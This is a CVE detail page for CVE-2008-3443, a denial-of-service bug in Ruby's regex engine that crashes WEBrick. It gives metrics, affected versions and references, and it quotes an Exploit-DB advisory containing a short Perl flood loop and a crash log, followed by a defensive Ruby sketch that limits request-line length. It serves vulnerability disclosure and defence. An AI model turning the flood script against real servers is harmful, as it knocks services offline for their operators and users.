CVE-2008-3443: Detail

CVE-2008-3443

18.83%V3
Network
2008-08-14 21h00 +00:00
2018-10-03 18h57 +00:00

CVE Descriptions

The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick.

CVE Information

Related Weaknesses

CWE-ID | Weakness name | Source
CWE-399 | Category: Resource Management Errors |
Weaknesses in this category are related to improper management of system resources.

Metrics

Metric | Score | Severity | CVSS Vector | Source
V2 | 5 | | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore serves to compare the EPSS score of one CVE against other CVEs.

Exploit Information

Exploit Database EDB-ID: 6239

Publication date: 2008-08-12 22h00 +00:00
Author: laurent gaffié
EDB Verified: Yes

-------------------------------------------------------
Language : Ruby
Web Site: www.ruby-lang.org
Platform: All
Bug: Remote Socket Memory Leak
Products Affected:
1.8 series:
- 1.8.5 and all prior versions
- 1.8.6-p286 and all prior versions
- 1.8.7-p71 and all prior versions
1.9 series
- r18423 and all prior revisions
Confirmed by the vendor: Yes
Patch available : Yes
-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits

===============
1) Introduction
===============

"A dynamic, open source programming language with a focus on simplicity and productivity.
It has an elegant syntax that is natural to read and easy to write."

=======
2) Bug
=======

Ruby fails to properly handle the memory allocated for a socket.
So when you send ~ 4 big requests to a Ruby socket, Ruby will go into an infinite loop, and then crash.
The bug resides in the regex engine (in regex.c).

===================
3) Proof of concept
===================

This PoC is an example for the Webrick web server

crap.pl :

#!/usr/bin/perl
use LWP::Simple;
my $payload = "\x41" x 49999999;
while(1)
{
print "[+]\n";
get "http://127.0.0.1:2500/".$payload."";
}

Result (Example on Webrick web server):

[2008-07-11 22:39:55] INFO WEBrick 1.3.1
[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux]
[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500
[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory
/usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line'
/usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse'
/usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run'
/usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:95:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:82:in `start'
/home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch'
script/server:62
[FATAL] failed to allocate memory
root@audit:/home/audit#

=====
5)Credits
=====

laurent gaffié
laurent.gaffie{remove_this}[at]gmail[dot]com

# milw0rm.com [2008-08-13]
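The backtrace above fails inside `read_request_line`, while an unbounded request line is being buffered. As an added example (not WEBrick's code and not the advisory author's), the Ruby sketch below caps the bytes read for a request line before any regular expression is applied. The names `MAX_REQUEST_LINE`, `RequestLineTooLong`, `BadRequestLine`, `read_bounded_request_line` and `status_for`, and the 2048-byte limit, are assumptions made for illustration.

```ruby
require 'stringio'

# Assumed limit for illustration; size it to the longest URI the application needs.
MAX_REQUEST_LINE = 2048

class RequestLineTooLong < StandardError; end
class BadRequestLine < StandardError; end

# Anchored pattern, applied only after the length check has passed.
REQUEST_LINE_RE = /\A(\S+)\s+(\S+)(?:\s+HTTP\/(\d+\.\d+))?\r?\n\z/

# Reads one request line from +io+ without buffering more than +limit+
# bytes. IO#gets(sep, limit) stops at the separator or at the limit,
# whichever comes first, so an oversized line shows up as a full-length
# chunk that does not end in a newline.
def read_bounded_request_line(io, limit = MAX_REQUEST_LINE)
  line = io.gets("\n", limit)
  raise BadRequestLine, 'connection closed before request line' if line.nil?
  if line.bytesize >= limit && !line.end_with?("\n")
    raise RequestLineTooLong, "request line exceeds #{limit} bytes"
  end
  m = REQUEST_LINE_RE.match(line)
  raise BadRequestLine, 'malformed request line' unless m
  { method: m[1], target: m[2], version: m[3] || '0.9' }
end

# Maps the outcome to the status a server would send (414 = URI Too Long).
def status_for(io, limit = MAX_REQUEST_LINE)
  read_bounded_request_line(io, limit)
  200
rescue RequestLineTooLong
  414
rescue BadRequestLine
  400
end

# Constructed sample inputs (not captured traffic).
if __FILE__ == $PROGRAM_NAME
  ok   = StringIO.new("GET /index.html HTTP/1.1\r\n")
  long = StringIO.new('GET /' + ('A' * 100_000) + " HTTP/1.1\r\n")
  puts status_for(ok)    # 200
  puts status_for(long)  # 414
end
```

The oversized line is rejected after at most `limit` bytes have been read, so the remainder of the request is never held in memory or handed to the regex engine.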

Products Mentioned

Configuration 0

Ruby-lang>>Ruby >> Version 1.6.8
Ruby-lang>>Ruby >> Version 1.8.0
Ruby-lang>>Ruby >> Version 1.8.1
Ruby-lang>>Ruby >> Version 1.8.2
Ruby-lang>>Ruby >> Version 1.8.3
Ruby-lang>>Ruby >> Version 1.8.4
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.6
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.9.0

References

http://secunia.com/advisories/31430
Tags: third-party-advisory, x_refsource_SECUNIA
https://usn.ubuntu.com/651-1/
Tags: vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/33185
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2009/dsa-1695
Tags: vendor-advisory, x_refsource_DEBIAN
http://support.apple.com/kb/HT3549
Tags: x_refsource_CONFIRM
http://www.securityfocus.com/bid/30682
Tags: vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/4158
Tags: third-party-advisory, x_refsource_SREASON
http://secunia.com/advisories/35074
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1021075
Tags: vdb-entry, x_refsource_SECTRACK
http://www.redhat.com/support/errata/RHSA-2008-0895.html
Tags: vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2008-0897.html
Tags: vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/33398
Tags: third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/32219
Tags: third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/6239
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.us-cert.gov/cas/techalerts/TA09-133A.html
Tags: third-party-advisory, x_refsource_CERT
http://www.vupen.com/english/advisories/2009/1297
Tags: vdb-entry, x_refsource_VUPEN
https://usn.ubuntu.com/691-1/
Tags: vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/32371
Tags: third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/32165
Tags: third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/32372
Tags: third-party-advisory, x_refsource_SECUNIA